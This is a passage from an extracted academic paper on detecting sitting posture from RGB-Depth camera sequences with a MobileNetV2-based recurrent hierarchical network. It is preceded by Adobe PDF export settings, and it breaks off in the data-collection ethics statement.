/LockDistillerParams false /MaxSubsetPct 100 /Optimize true /OPM 1 /ParseDSCComments true /ParseDSCCommentsForDocInfo true /PreserveCopyPage true /PreserveDICMYKValues true /PreserveEPSInfo true /PreserveFlatness true /PreserveHalftoneInfo false /PreserveOPIComments false /PreserveOverprintSettings true /StartPage 1 /SubsetFonts true /TransferFunctionInfo /Apply /UCRandBGInfo /Preserve /UsePrologue false /ColorSettingsFile (None) /AlwaysEmbed [ true ] /NeverEmbed [ true ] /AntiAliasColorImages false /CropColorImages true /ColorImageMinResolution 300 /ColorImageMinResolutionPolicy /OK /DownsampleColorImages false /ColorImageDownsampleType /Average /ColorImageResolution 300 /ColorImageDepth 8 /ColorImageMinDownsampleDepth 1 /ColorImageDownsampleThreshold 1.50000 /EncodeColorImages true /ColorImageFilter /FlateEncode /AutoFilterColorImages false /ColorImageAutoFilterStrategy /JPEG /ColorACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /ColorImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000ColorACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000ColorImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasGrayImages false /CropGrayImages true /GrayImageMinResolution 300 /GrayImageMinResolutionPolicy /OK /DownsampleGrayImages false /GrayImageDownsampleType /Average /GrayImageResolution 300 /GrayImageDepth 8 /GrayImageMinDownsampleDepth 2 /GrayImageDownsampleThreshold 1.50000 /EncodeGrayImages true /GrayImageFilter /FlateEncode /AutoFilterGrayImages false /GrayImageAutoFilterStrategy /JPEG /GrayACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /GrayImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000GrayACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000GrayImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasMonoImages false /CropMonoImages true /MonoImageMinResolution 1200 /MonoImageMinResolutionPolicy /OK /DownsampleMonoImages false /MonoImageDownsampleType /Average /MonoImageResolution 1200 /MonoImageDepth -1 /MonoImageDownsampleThreshold 1.50000 /EncodeMonoImages true /MonoImageFilter /CCITTFaxEncode /MonoImageDict << /K -1 >> /AllowPSXObjects false /CheckCompliance [ /None ] /PDFX1aCheck false /PDFX3Check false /PDFXCompliantPDFOnly false /PDFXNoTrimBoxError true /PDFXTrimBoxToMediaBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXSetBleedBoxToMediaBox true /PDFXBleedBoxToTrimBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXOutputIntentProfile (None) /PDFXOutputConditionIdentifier () /PDFXOutputCondition () /PDFXRegistryName () /PDFXTrapped /False /CreateJDFFile false /Description << /CHS <FEFF4f7f75288fd94e9b8bbe5b9a521b5efa7684002000500044004600206587686353ef901a8fc7684c976262535370673a548c002000700072006f006f00660065007200208fdb884c9ad88d2891cf62535370300260a853ef4ee54f7f75280020004100630072006f0062006100740020548c002000410064006f00620065002000520065006100640065007200200035002e003000204ee553ca66f49ad87248672c676562535f00521b5efa768400200050004400460020658768633002> /CHT <FEFF4f7f752890194e9b8a2d7f6e5efa7acb7684002000410064006f006200650020005000440046002065874ef653ef5728684c9762537088686a5f548c002000700072006f006f00660065007200204e0a73725f979ad854c18cea7684521753706548679c300260a853ef4ee54f7f75280020004100630072006f0062006100740020548c002000410064006f00620065002000520065006100640065007200200035002e003000204ee553ca66f49ad87248672c4f86958b555f5df25efa7acb76840020005000440046002065874ef63002> /DAN <FEFF004200720075006700200069006e0064007300740069006c006c0069006e006700650072006e0065002000740069006c0020006100740020006f007000720065007400740065002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e007400650072002000740069006c0020006b00760061006c00690074006500740073007500640073006b007200690076006e0069006e006700200065006c006c006500720020006b006f007200720065006b007400750072006c00e60073006e0069006e0067002e0020004400650020006f007000720065007400740065006400650020005000440046002d0064006f006b0075006d0065006e0074006500720020006b0061006e002000e50062006e00650073002000690020004100630072006f00620061007400200065006c006c006500720020004100630072006f006200610074002000520065006100640065007200200035002e00300020006f00670020006e0079006500720065002e> /DEU <FEFF00560065007200770065006e00640065006e0020005300690065002000640069006500730065002000450069006e007300740065006c006c0075006e00670065006e0020007a0075006d002000450072007300740065006c006c0065006e00200076006f006e002000410064006f006200650020005000440046002d0044006f006b0075006d0065006e00740065006e002c00200076006f006e002000640065006e0065006e002000530069006500200068006f00630068007700650072007400690067006500200044007200750063006b006500200061007500660020004400650073006b0074006f0070002d0044007200750063006b00650072006e00200075006e0064002000500072006f006f0066002d00470065007200e400740065006e002000650072007a0065007500670065006e0020006d00f60063006800740065006e002e002000450072007300740065006c006c007400650020005000440046002d0044006f006b0075006d0065006e007400650020006b00f6006e006e0065006e0020006d006900740020004100630072006f00620061007400200075006e0064002000410064006f00620065002000520065006100640065007200200035002e00300020006f0064006500720020006800f600680065007200200067006500f600660066006e00650074002000770065007200640065006e002e> /ESP <FEFF005500740069006c0069006300650020006500730074006100200063006f006e0066006900670075007200610063006900f3006e0020007000610072006100200063007200650061007200200064006f00630075006d0065006e0074006f0073002000640065002000410064006f0062006500200050004400460020007000610072006100200063006f006e00730065006700750069007200200069006d0070007200650073006900f3006e002000640065002000630061006c006900640061006400200065006e00200069006d0070007200650073006f0072006100730020006400650020006500730063007200690074006f00720069006f00200079002000680065007200720061006d00690065006e00740061007300200064006500200063006f00720072006500630063006900f3006e002e002000530065002000700075006500640065006e00200061006200720069007200200064006f00630075006d0065006e0074006f00730020005000440046002000630072006500610064006f007300200063006f006e0020004100630072006f006200610074002c002000410064006f00620065002000520065006100640065007200200035002e003000200079002000760065007200730069006f006e0065007300200070006f00730074006500720069006f007200650073002e> /FRA <FEFF005500740069006c006900730065007a00200063006500730020006f007000740069006f006e00730020006100660069006e00200064006500200063007200e900650072002000640065007300200064006f00630075006d0065006e00740073002000410064006f00620065002000500044004600200070006f007500720020006400650073002000e90070007200650075007600650073002000650074002000640065007300200069006d007000720065007300730069006f006e00730020006400650020006800610075007400650020007100750061006c0069007400e90020007300750072002000640065007300200069006d007000720069006d0061006e0074006500730020006400650020006200750072006500610075002e0020004c0065007300200064006f00630075006d0065006e00740073002000500044004600200063007200e900e90073002000700065007500760065006e0074002000ea0074007200650020006f007500760065007200740073002000640061006e00730020004100630072006f006200610074002c002000610069006e00730069002000710075002700410064006f00620065002000520065006100640065007200200035002e0030002000650074002000760065007200730069006f006e007300200075006c007400e90072006900650075007200650073002e> /ITA <FEFF005500740069006c0069007a007a006100720065002000710075006500730074006500200069006d0070006f007300740061007a0069006f006e00690020007000650072002000630072006500610072006500200064006f00630075006d0065006e00740069002000410064006f006200650020005000440046002000700065007200200075006e00610020007300740061006d007000610020006400690020007100750061006c0069007400e00020007300750020007300740061006d00700061006e0074006900200065002000700072006f006f0066006500720020006400650073006b0074006f0070002e0020004900200064006f00630075006d0065006e007400690020005000440046002000630072006500610074006900200070006f00730073006f006e006f0020006500730073006500720065002000610070006500720074006900200063006f006e0020004100630072006f00620061007400200065002000410064006f00620065002000520065006100640065007200200035002e003000200065002000760065007200730069006f006e006900200073007500630063006500730073006900760065002e> /JPN <FEFF9ad854c18cea51fa529b7528002000410064006f0062006500200050004400460020658766f8306e4f5c6210306b4f7f75283057307e30593002537052376642306e753b8cea3092670059279650306b4fdd306430533068304c3067304d307e3059300230c730b930af30c830c330d730d730ea30f330bf3067306e53705237307e305f306f30d730eb30fc30d57528306b9069305730663044307e305930023053306e8a2d5b9a30674f5c62103055308c305f0020005000440046002030d530a130a430eb306f3001004100630072006f0062006100740020304a30883073002000410064006f00620065002000520065006100640065007200200035002e003000204ee5964d3067958b304f30533068304c3067304d307e30593002> /KOR <FEFFc7740020c124c815c7440020c0acc6a9d558c5ec0020b370c2a4d06cd0d10020d504b9b0d1300020bc0f0020ad50c815ae30c5d0c11c0020ace0d488c9c8b85c0020c778c1c4d560002000410064006f0062006500200050004400460020bb38c11cb97c0020c791c131d569b2c8b2e4002e0020c774b807ac8c0020c791c131b41c00200050004400460020bb38c11cb2940020004100630072006f0062006100740020bc0f002000410064006f00620065002000520065006100640065007200200035002e00300020c774c0c1c5d0c11c0020c5f40020c2180020c788c2b5b2c8b2e4002e> /NLD (Gebruik deze instellingen om Adobe PDF-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. De gemaakte PDF-documenten kunnen worden geopend met Acrobat en Adobe Reader 5.0 en hoger.) /NOR <FEFF004200720075006b00200064006900730073006500200069006e006e007300740069006c006c0069006e00670065006e0065002000740069006c002000e50020006f0070007000720065007400740065002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e00740065007200200066006f00720020007500740073006b00720069006600740020006100760020006800f800790020006b00760061006c00690074006500740020007000e500200062006f007200640073006b0072006900760065007200200065006c006c00650072002000700072006f006f006600650072002e0020005000440046002d0064006f006b0075006d0065006e00740065006e00650020006b0061006e002000e50070006e00650073002000690020004100630072006f00620061007400200065006c006c00650072002000410064006f00620065002000520065006100640065007200200035002e003000200065006c006c00650072002000730065006e006500720065002e> /PTB <FEFF005500740069006c0069007a006500200065007300730061007300200063006f006e00660069006700750072006100e700f50065007300200064006500200066006f0072006d00610020006100200063007200690061007200200064006f00630075006d0065006e0074006f0073002000410064006f0062006500200050004400460020007000610072006100200069006d0070007200650073007300f5006500730020006400650020007100750061006c0069006400610064006500200065006d00200069006d00700072006500730073006f0072006100730020006400650073006b0074006f00700020006500200064006900730070006f00730069007400690076006f0073002000640065002000700072006f00760061002e0020004f007300200064006f00630075006d0065006e0074006f00730020005000440046002000630072006900610064006f007300200070006f00640065006d0020007300650072002000610062006500720074006f007300200063006f006d0020006f0020004100630072006f006200610074002000650020006f002000410064006f00620065002000520065006100640065007200200035002e0030002000650020007600650072007300f50065007300200070006f00730074006500720069006f007200650073002e> /SUO <FEFF004b00e40079007400e40020006e00e40069007400e4002000610073006500740075006b007300690061002c0020006b0075006e0020006c0075006f0074002000410064006f0062006500200050004400460020002d0064006f006b0075006d0065006e007400740065006a00610020006c0061006100640075006b006100730074006100200074007900f6007000f60079007400e400740075006c006f0073007400750073007400610020006a00610020007600650064006f007300740075007300740061002000760061007200740065006e002e00200020004c0075006f0064007500740020005000440046002d0064006f006b0075006d0065006e00740069007400200076006f0069006400610061006e0020006100760061007400610020004100630072006f0062006100740069006c006c00610020006a0061002000410064006f00620065002000520065006100640065007200200035002e0030003a006c006c00610020006a006100200075007500640065006d006d0069006c006c0061002e> /SVE <FEFF0041006e007600e4006e00640020006400650020006800e4007200200069006e0073007400e4006c006c006e0069006e006700610072006e00610020006f006d002000640075002000760069006c006c00200073006b006100700061002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e00740020006600f600720020006b00760061006c00690074006500740073007500740073006b0072006900660074006500720020007000e5002000760061006e006c00690067006100200073006b0072006900760061007200650020006f006300680020006600f600720020006b006f007200720065006b007400750072002e002000200053006b006100700061006400650020005000440046002d0064006f006b0075006d0065006e00740020006b0061006e002000f600700070006e00610073002000690020004100630072006f0062006100740020006f00630068002000410064006f00620065002000520065006100640065007200200035002e00300020006f00630068002000730065006e006100720065002e> /ENU (Use these settings to create Adobe PDF documents for quality printing on desktop printers and proofers. Created PDF documents can be opened with Acrobat and Adobe Reader 5.0 and later.) >> /Namespace [ (Adobe) (Common) (1.0) ] /OtherNamespaces [ << /AsReaderSpreads false /CropImagesToFrames true /ErrorControl /WarnAndContinue /FlattenerIgnoreSpreadOverrides false /IncludeGuidesGrids false /IncludeNonPrinting false /IncludeSlug false /Namespace [ (Adobe) (InDesign) (4.0) ] /OmitPlacedBitmaps false /OmitPlacedEPS false /OmitPlacedPDF false /SimulateOverprint /Legacy >> << /AddBleedMarks false /AddColorBars false /AddCropMarks false /AddPageInfo false /AddRegMarks false /ConvertColors /NoConversion /DestinationProfileName () /DestinationProfileSelector /NA /Downsample16BitImages true /FlattenerPreset << /PresetSelector /MediumResolution >> /FormElements false /GenerateStructure true /IncludeBookmarks false /IncludeHyperlinks false /IncludeInteractive false /IncludeLayers false /IncludeProfiles true /MultimediaHandling /UseObjectSettings /Namespace [ (Adobe) (CreativeSuite) (2.0) ] /PDFXOutputIntentProfileSelector /NA /PreserveEditing true /UntaggedCMYKHandling /LeaveUntagged /UntaggedRGBHandling /LeaveUntagged /UseDocumentBleed false >> ] >> setdistillerparams << /HWResolution [2400 2400] /PageSize [612.000 792.000] >> setpagedevice work_qxvnriwsrjgqnj45s4f47lnzca ---- Detection of sitting posture using hierarchical image composition and deep learning Detection of sitting posture using hierarchical image composition and deep learning Audrius Kulikajevas1, Rytis Maskeliunas1 and Robertas Damaševičius2,3 1 Department of Multimedia Engineering, Kaunas University of Technology, Kaunas, Lithuania 2 Department of Applied Informatics, Vytautas Magnus University, Kaunas, Lithuania 3 Faculty of Applied Mathematics, Silesian University of Technology, Gliwice, Poland ABSTRACT Human posture detection allows the capture of the kinematic parameters of the human body, which is important for many applications, such as assisted living, healthcare, physical exercising and rehabilitation. This task can greatly benefit from recent development in deep learning and computer vision. In this paper, we propose a novel deep recurrent hierarchical network (DRHN) model based on MobileNetV2 that allows for greater flexibility by reducing or eliminating posture detection problems related to a limited visibility human torso in the frame, i.e., the occlusion problem. The DRHN network accepts the RGB-Depth frame sequences and produces a representation of semantically related posture states. We achieved 91.47% accuracy at 10 fps rate for sitting posture recognition. Subjects Human-Computer Interaction, Artificial Intelligence, Computer Vision Keywords Posture detection, Computer vision, Deep learning, Artificial neural network, Depth sensors, Sitting posture, e-Health INTRODUCTION Machine learning and deep learning has shown very good results when applied to various computer vision applications such as detection of plant diseases in agriculture (Kamilaris & Prenafeta-Boldú, 2018), fault diagnosis in industrial engineering (Wen et al., 2018), brain tumor recognition from MR images (Chen et al., 2018a), segmentation of endoscopic images for gastric cancer (Hirasawa et al., 2018), or skin lesion recognition (Li & Shen, 2018) and even autonomous vehicles (Alam et al., 2019). As our daily life increasingly depends on sitting work and the opportunities for physical exercising (in the context of COVID-19 pandemic associated restrictions and lockdowns are diminished), many people are facing various medical conditions directly related to such sedentary lifestyles. One of the frequently mentioned problems is back pain, with bad sitting posture being one of the compounding factors to this problem (Grandjean & Hünting, 1977; Sharma & Majumdar, 2009). Inadequate postures adopted by office workers are one of the most significant risk factors of work-related musculoskeletal disorders. The direct consequence may be back pain, while indirectly it has been associated with cervical disease, myopia, cardiovascular diseases and premature mortality (Cagnie et al., 2006). One study (Alberdi et al., 2018) has demonstrated that body posture is one of the best predictors of stress and mental workload levels. Another study linked postural instability and gait difficulty with a rapid rate of Parkinson’s disease progression How to cite this article Kulikajevas A, Maskeliunas R, Damaševičius R. 2021. Detection of sitting posture using hierarchical image composition and deep learning. PeerJ Comput. Sci. 7:e442 DOI 10.7717/peerj-cs.442 Submitted 16 November 2020 Accepted 24 February 2021 Published 23 March 2021 Corresponding author Robertas Damaševičius, robertas.damasevicius@polsl.pl Academic editor Siddhartha Bhattacharyya Additional Information and Declarations can be found on page 15 DOI 10.7717/peerj-cs.442 Copyright 2021 Kulikajevas et al. Distributed under Creative Commons CC-BY 4.0 http://dx.doi.org/10.7717/peerj-cs.442 mailto:robertas.�damasevicius@�polsl.�pl https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.442 http://www.creativecommons.org/licenses/by/4.0/ http://www.creativecommons.org/licenses/by/4.0/ https://peerj.com/computer-science/ (Jankovic et al., 1990). Posture recognition is also relevant for disabled people (Ma et al., 2020) and elderly people for proper health diagnostics (Chen et al., 2018b) as the sedentary behavior has a negative effect on people’s wellbeing and health. Therefore, the solutions that would improve the daily living conditions of both healthy and spine pain affected people in the context of assisted living environments (Maskeliunas, Damaševičius & Segal, 2019). While there are existing classical approaches for human posture prediction, unfortunately, they generally assert that entire human skeleton is visible in frame. Even though those assumptions of scene composition are valid, with everyone moving to their home offices, meeting them is simply not feasible. Not everyone is capable of having complex multi-camera setups to track their body posture. For this reason, there is a need for a solution that is able to inform the end-user (or their care provider) of their bad posture with cheaply available consumer sensors in order to improve their wellbeing without real-time supervision. With the renaissance of machine learning, and its application in computer vision tasks, we are able to solve a lot of complex tasks using black box models by shifting the majority of computations from the end-user device into the training stage. For this reason, artificial neural networks have been used in wide variety of applications. In this article, we propose a novel deep recurrent hierarchical neural network approach for tracking human posture in home office environments, where majority of the person sitting at the desk and therefore is occluded from the camera. Additionally, a pilot of 11 test subjects is made in order to validate our approach effectiveness. RELATED WORK The existing solutions such as orthopedic posture braces may not be viable solution due to other underlying medical conditions. Computer-aided posture tracking combined with behaviour improvement techniques due to continuous monitoring and self-assessment can contribute to remedy this issue (Dias & Cunha, 2018). The most prominent solution to this problem is skeleton based posture recognition (Jiang et al., 2015) using commercially available depth sensors such as Microsoft Kinect (Zhang, 2012) and Intel Realsense (Keselman et al., 2017). However, these solutions generally depend on some assertions, i.e., camera calibration settings, lightning conditions, expected posture (Hondori & Khademi, 2014), often making the results unreliable. For identifying inadequate posture wearable textile sensors (García Patiño, Khoshnam & Menon, 2020), inertial and magnetic sensors attached to human body (Bouvier et al., 2015), depth cameras (Ho et al., 2016), radio-frequency identification tags (Saab & Msheik, 2016), 3D motion analysis (Perusquía-Hernández et al., 2017), video surveillance (Afza et al., 2021), Kinect sensors (Ryselis et al., 2020) and sensors attached to office chairs (Zemp et al., 2016; Bibbo et al., 2019) were used, while registering body posture parameters such as forward inclination, distance to the computer, and relative skeletal angles. However, the camera-based systems have demanding requirements for distance, proper lighting, calibration and non-occlusion. Kulikajevas et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.442 2/20 http://dx.doi.org/10.7717/peerj-cs.442 https://peerj.com/computer-science/ Another approach focuses on wiring sensors directly to the human body to acquire data, although it limits the freedom of movement for work activities (Arnold et al., 2020). Despite these achievements, it is still quite difficult to recognize posture in real-time or correctly identify transitional activities in real-world environments (Nweke et al., 2019) as the recognition of fine-grained activities such as correct or incorrect cases of sitting postures is still a problem (Chin et al., 2019). Currently, the state of the art in non-invasive posture tracking is depth and image processing (Abobakr, Hossny & Nahavandi, 2018; Matthew et al., 2019; Camalan et al., 2018). For example, Huang & Gao (2019) reconstruct realistic 3D human poses using the 3D coordinates of joint points captured by the depth camera and employ conformal geometric algebra to improve human limb modelling. Li, Bai & Han (2020) used OptiTrack and Kinect v2 to get and transfer data into a human skeleton coordinates. They used random forest regression learn the joint offset regression function, and adjust the skeleton based on the predictions on joint offset. Finally, as a result, they can determine the motions based on predicted posture. Liu et al. (2020) suggested 3D Convolutional Neural Network (CNN), called 3D PostureNet, while Gaussian voxel modeling is adopted to represent posture configurations. The method allows to eliminate the coordinate deviations caused by various recording environments and posture displacements. Pham et al. (2019) exploit Deep CNNs based on the DenseNet model to learn directly an end-to- end mapping between the input skeleton sequences and their action label for human activity recognition. The network learns spatio—temporal patterns of skeletal movements and their discriminative features for further downstream classification tasks. Sengupta et al. (2020) detect skeletal joints using mmWave radar reflection signals. First, the reflected radar point cloud. Next, CNN was trained on radar-to-image representation and used to predict the position of the skeletal joints in 3-D space. The method was evaluated in a single person scenario using four primary motions. The method has shown to be robust in adverse weather conditions and deviations in light conditions. However, none of the above mentioned methods are applicable when only the upper part of the body is visible. Some methods tried to tackle this problem by exploiting the temporal relationship between the body parts to deal with the occlusion problem and to get the occluded depth information (Huang, Hsu & Huang, 2013) or by recreating a topological character (Bei et al., 2017), yet they still require a recreation of a full body skeleton. To address this problem, we propose a novel approach for human posture classification by using a supervised hierarchical neural network (Liu et al., 2019) that uses the RGB-Depth data as input. Our method extends MobileNetV2 (Sandler et al., 2018) neural network to include the recurrent layers. This allows the network to learn from a sequence of images by adding the dimension of time to our feature list. Allowing the network to use the context of what happened in previous frames to make predictions. This is an improvement over existing methods for skeleton prediction as this allows for our approach to predict user posture in more complex environments, for example, when a person is sitting in front of an office desk thus a large portion of his/her body is occluded. Kulikajevas et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.442 3/20 http://dx.doi.org/10.7717/peerj-cs.442 https://peerj.com/computer-science/ Such position would cause other known skeleton-based posture prediction methods to fail, due to lack of data provided by the sensors to infer the full human skeleton. Our novelty is the use only a simple depth camera, so the subject does not need to wear any sensors on their body nor have entire body visible in sensor field of view. In fact, only the upper 30% of the body may be visible, whereas when using the Kinect style sensor, the lower legs must be visible or generated artificially to allow the reconstruction of the skeleton or, otherwise, the recognition process fails. Our approach does not rely on a (visual or artificial) reconstruction of the full skeleton and, thus, allows for the detection of posture in advanced scenarios such as sitting at a desk, where a camera often receives very limited information. METHODS Network architecture Our preliminary analysis has shown that it is very hard to predict human posture based on a single shot. For this reason, we opted to use time sequences with n = 4 frames. However, during training the input has a variable length of 1 ≤ n ≤ 4, with each frame being about a second apart to reduce the dependence on the previous frames. We selected to use deep convolutional recurrent neural networks for they have shown some of the best capabilities when it comes to similar tasks requiring to predict sequences of data as with natural speech recognition (Sundermeyer, Ney & Schlu, 2015; Graves, Mohamed & Hinton, 2013) or even traffic prediction (Ji & Hong, 2019). The input of our network architecture (Fig. 1) is the RGB-D frame sequence that is fed into depth-wise convolutional block (Zhang et al., 2019), which reduces the dimensionality of each frame by a factor of two, without losing each individual channel’s influence on the output. This is due to depth-wise convolutions applying separate kernels for each channel. This is then followed by a convolutional layer in order to extract the best individual features, which is followed by a second dimensionality reduction layer. We do this because our input frames are captured at 640 × 480 px resolution, which is the maximum hardware resolution of the Intel Realsense D435i device. Reducing the dimensionality twice leaves us with 128 features, each of 160 × 120 px resolution. At this stage, we use Long Short Term Memory (LSTM) convolutional block (Xu et al., 2020; Li et al., 2020), which is tasked to extract 32 most useful features in the entire sequence. Figure 1 Our recurrent hierarchical ANN architecture using MobileNetV2 as the main backbone. It takes the RGB-D frame sequence as input and outputs the flattened prediction tree as a result. Full-size DOI: 10.7717/peerj-cs.442/fig-1 Kulikajevas et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.442 4/20 http://dx.doi.org/10.7717/peerj-cs.442/fig-1 http://dx.doi.org/10.7717/peerj-cs.442 https://peerj.com/computer-science/ For our main neural network backbone, we use MobileNetV2, which is the extension of MobileNet, for it has show to achieve great results in predictive capabilities (Howard et al., 2017; Zhou et al., 2019), however, the architecture itself is relatively light-weight for it is designed to be used in low power devices such as mobile devices, unlike for example, YOLOV3, which while having impressive recall results (Redmon & Farhadi, 2018), is much more complex and has a substantially poorer performance. The MobileNetV2 output is then connected to a global average pooling layer in order to reduce dimensionality and improve generalization rate (Zhou et al., 2016). Finally, the output is subsequently connected to a fully-connected layer, which represents the flattened representation of posture state prediction hierarchy, which can be seen in Fig. 2. Our entire ANN setup can be seen in Table 1. After each of two bottleneck layers we additionally use spatial dropout layers as it is shown to improve generalization during training and reduce the effect of nearby pixels being strongly correlated within the feature maps (Murugan & Durairaj, 2017), each with dropout probability of 0.2, whereas the spatial dropout post LSTM cell has a dropout probability of 0.3, because the higher the network is upstream the more dropout layers influence the entire network, therefore high values upstream may cause the network to be more unstable and difficult to train. The dropout layer before the output layer however, has a dropout probability of 50%. Aggressive dropout values reduce the chance that the model is will overfit by training on noise instead of image features. All our previous layers up to this point had used Rectified Linear Unit as our activation function in order to impose non-linearity into our model for it has shown better results and improved performance due to its mathematical simplicity in CNNs (Hanin, 2019). However, for the last layer we opted to use the sigmoid activation due to our network outputting hierarchical values and acting as multi-label classifier, while the softmax activation is more useful for multi-class classification tasks. Figure 2 Flattened hierarchy representation of postures expanded into a hierarchical tree. Full-size DOI: 10.7717/peerj-cs.442/fig-2 Kulikajevas et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.442 5/20 http://dx.doi.org/10.7717/peerj-cs.442/fig-2 http://dx.doi.org/10.7717/peerj-cs.442 https://peerj.com/computer-science/ Algorithm of sitting posture detection Figure 3 depicts algorithm of our enhanced posture detection solution. Process starts with the initialization of model weights for sorting out the RGB-D camera output (both depth and RGB as varying on the condition either modality can provide compensation features). Algorithm then tries to reconstruct intermediate frame for retrieval and analysis of frame semantics, which are then used for stack validity status verification. Assuming the condition, analysis starts in the recurrent layers of our modified MobileNet v2 architecture, with Pareto-Optimal berparameter optimization (Plonis et al., 2020). The model then assigns prediction labels and algorithm further tries to improve the quality by firing smart semantic prediction analyzer, checking not only the output value but probable output status for a combined confidence level of <40%, as an improved determinator for further frame semantic analysis. A final validity status is then initiated, depending on condition leading to a majority voting and a very reliable detection of bad posture. Algorithm was designed to work continuously and is able to automatically stop processing to stay compatible with green computing paradigm (Okewu et al., 2017) to save energy. Prediction of posture states We adopted the semantic matchmaking approach (Ruta et al., 2014) to describe the semantic relationship between different postures using an ontological tree for analysis, reasoning and knowledge discovery. In order to extract the specific prediction label we parse the posture hierarchy tree (Fig. 2), first, by checking, which posture state is most likely according to the neural network. Once we know, which posture type is most likely to be represented in the frame sequence, we proceed to the sub-nodes and check their predictions. We continue this search until we find the leaf node, which represents the actual label. This approach allows us to filter out the most likely path that is seen in the frames. This is helpful in cases when the similarities between postures is large. Table 1 Layers of the proposed neural network architecture for human posture recognition. Type Filters Size Output Input – – t × 640 × 480 Depthwise convolution – 11 × 11/2 t × 320 × 240 Convolution 64 1 × 1 t × 320 × 240 Spatial dropout P(x) = 0.2 – t × 320 × 240 Depthwise convolution – 5 × 5/2 t × 160 × 120 Convolution 128 1 × 1 t × 160 × 120 Spatial dropout P(x) = 0.2 – t × 160 × 120 LSTM convolution 16 3 × 3 160 × 120 Spatial dropout P(x) = 0.3 – 160 × 120 MobileNetV2 – – 4 × 5 Global average pooling – – 1,280 Dropout P(x) = 0.5 – 1,280 Fully-connected (sigmoid) – – 8 Kulikajevas et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.442 6/20 http://dx.doi.org/10.7717/peerj-cs.442 https://peerj.com/computer-science/ For example, all forward postures share the same characteristics—shoulders are not at 90 degree angle, and the head is positioned forward with respect to the body. This allows us to ignore all the weight influences, where for example, the person is lying down. Additionally, the further down the tree the label leaves are the less of an overall recall error is, due to each level of the tree being ontologically similar, for example, predicting lying down, instead of partially lying down is a smaller error than predicting hunched over. Loss function One of the reasons why we use the flattened final layer to represent our posture hierarchy is because we can represent our problem as multi-label classification (Wang et al., 2019). This allows us to use binary cross-entropy (Eq. (1)) in order to calculate the loss between expected output and ground truth: Hp ¼ XN i¼1 ŷi � logðyiÞ þ ð1 � ŷiÞ � logð1 � yiÞ (1) Figure 3 Activity diagram of the proposed method for sitting posture state recognition. Full-size DOI: 10.7717/peerj-cs.442/fig-3 Kulikajevas et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.442 7/20 http://dx.doi.org/10.7717/peerj-cs.442/fig-3 http://dx.doi.org/10.7717/peerj-cs.442 https://peerj.com/computer-science/ Binary cross-entropy classifier is fit for our multi-label classification task (Wu et al., 2018) as each of our cells output is a binary one and more than one cell can be positive at a time, depending on how deep the classification is, as opposed to the categorical cross- entropy, which is a solution for multi-class tasks, where the input can yield only a single- class output. Network training For training a neural network various optimization methods have been proposed. However, one of the most popular optimization methods due to its computational efficiency allowing training ANN on large datasets more easily on weaker hardware in addition to the ability to achieve faster convergence than other methods is Adam (Kingma & Ba, 2015). For these reasons, we had opted to use Adam for training using the initial training rate of 5e−4, with a batch size of eight. Additionally, we perform data augmentation as it has shown to improve ANN generalization (Fawzi et al., 2016). We perform horizontal image flipping in order to increase the view count, and perform random hue and saturation changes, aiming to increase stability against different lightning conditions as all of our video sequence instances were recorded during same time frame, therefore, maintaining nearly identical lightning. In all cases, the identical augmentation values are used for all images in the same series with the same probability of performing image flipping, hue and saturation augmentation being 50% independently. Random hue shift is performed in the range of h = [0, 2π) radians, while the saturation has the random range of s = [0, 2]. Data collection ANNs have the benefit of doing all the heavy work upfront during the training therefore, allowing to improve system runtime by reducing the number of required calculations (Holden et al., 2019). However, this approach depends on the quality of the training data, which can be defined in terms of the size of available samples, class balance and even the correctness of the labels. Our approach depends on both color and depth information. Unfortunately, still there are no publicly available labeled human posture dataset that additionally provides depth information. For our experiments, we have devised a methodology to create such dataset. The data collection procedure consists of two stages. Stage I The person starts by sitting up straight. This position is then filmed for 30 s. Afterwards, the person is instructed to lightly hunch forward, which is followed by another 30 s of sitting in this position. Afterwards, the person is again instructed to hunch more, emulating their average hunching posture. After the filming, the subject is instructed once more to hunch forward in order to emulate the worst possible forward posture. Once the 30 s have been recorded in this posture, the person is then instructed to sit up straight for an additional 30 s to get used to this position. Then, we start emulating the bad backwards posture, i.e., lying down in the chair. The person is instructed to Kulikajevas et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.442 8/20 http://dx.doi.org/10.7717/peerj-cs.442 https://peerj.com/computer-science/ partially lie in the chair for 30 s, after which he/she is instructed to do it twice more in increasingly bad posture positions giving us three sets of bad forward and backward posture examples. Stage II The person is instructed to initially sit up straight. Then the person is instructed to start slowly counting from one to five, while slowly worsening their forward posture. When the person finishes counting, he/she is expected to be in the worst forward posture they imagine. Afterwards, the subject returns to straight position. This action is repeated for five times. Once the forward posture data is recorded, the person is asked to perform the similar action, this time with backwards posture, where once again when they finish counting, they are fully lying in the chair. Each of the stages is recorded three separate times using different camera perspectives at 10 o’clock, 12 o’clock and 3 o’clock. The person is filmed in front of the computer desk and during the filming they are asked to interact with the table in their current posture how they imagine they would sit on the table. This can range from drawing on a piece of article, to checking the drawers, using keyboard or even holding their head with their hand. When collecting our dataset, we asked 11 subjects (seven men and four women) to perform the posture emulation tasks. The informed consent was obtained, while we followed strictly the requirements of the Helsinki declaration. The research was approved by the Institutional Review Board, Faculty of 